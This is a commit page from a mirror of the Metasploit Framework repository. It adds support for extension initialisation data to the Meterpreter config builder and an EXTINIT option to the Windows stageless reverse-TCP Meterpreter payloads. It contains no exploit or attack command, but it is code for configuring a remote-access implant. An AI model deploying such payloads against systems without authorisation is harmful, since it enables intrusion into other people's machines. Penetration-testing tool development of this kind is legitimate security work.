infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding stageless init script support

bug/bundler_fix
OJ 2015-11-10 19:18:47 +10:00
parent 2f362aec69
commit a28ab216d3
3 changed files with 31 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
lib/rex/payloads/meterpreter/config.rb
View File

@ -120,6 +120,20 @@ private
extension_data = [ ext.length, ext ].pack('VA*') extension_data = [ ext.length, ext ].pack('VA*')
end end
def extension_init_block(name, value)
# for now, we're going to blindly assume that the value is a path to a file
# which contains the data that gets passed to the extension
content = ::File.read(value)
data = [
name,
"\x00",
content.length,
content
]
data.pack('A*A*VA*')
end
def config_block def config_block
# start with the session information # start with the session information
config = session_block(@opts) config = session_block(@opts)
@ -148,6 +162,15 @@ private
config << [0].pack('Q<') config << [0].pack('Q<')
end end
# wire in the extension init data
(@opts[:ext_init] || '').split(':').each do |cfg|
name, value = cfg.split(',')
config << extension_init_block(name, value)
end
# terminate the ext init config with a final null byte
config << "\x00"
# and we're done # and we're done
config config
end end

6
modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
View File

@ -35,7 +35,8 @@ module Metasploit3
)) ))
register_options([ register_options([
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
OptString.new('EXTINIT', [false, 'Initialision strings for extensions']),
], self.class) ], self.class)
end end
@ -53,7 +54,8 @@ module Metasploit3
expiration: datastore['SessionExpirationTimeout'].to_i, expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid], uuid: opts[:uuid],
transports: [transport_config_reverse_tcp(opts)], transports: [transport_config_reverse_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',') extensions: (datastore['EXTENSIONS'] || '').split(','),
ext_init: (datastore['EXTINIT'] || '')
} }
# create the configuration instance based off the parameters # create the configuration instance based off the parameters

6
modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
View File

@ -35,7 +35,8 @@ module Metasploit4
)) ))
register_options([ register_options([
OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]), OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
OptString.new('EXTINIT', [false, 'Initialision strings for extensions']),
], self.class) ], self.class)
end end
@ -53,7 +54,8 @@ module Metasploit4
expiration: datastore['SessionExpirationTimeout'].to_i, expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid], uuid: opts[:uuid],
transports: [transport_config_reverse_tcp(opts)], transports: [transport_config_reverse_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',') extensions: (datastore['EXTENSIONS'] || '').split(','),
ext_init: (datastore['EXTINIT'] || '')
} }
# create the configuration instance based off the parameters # create the configuration instance based off the parameters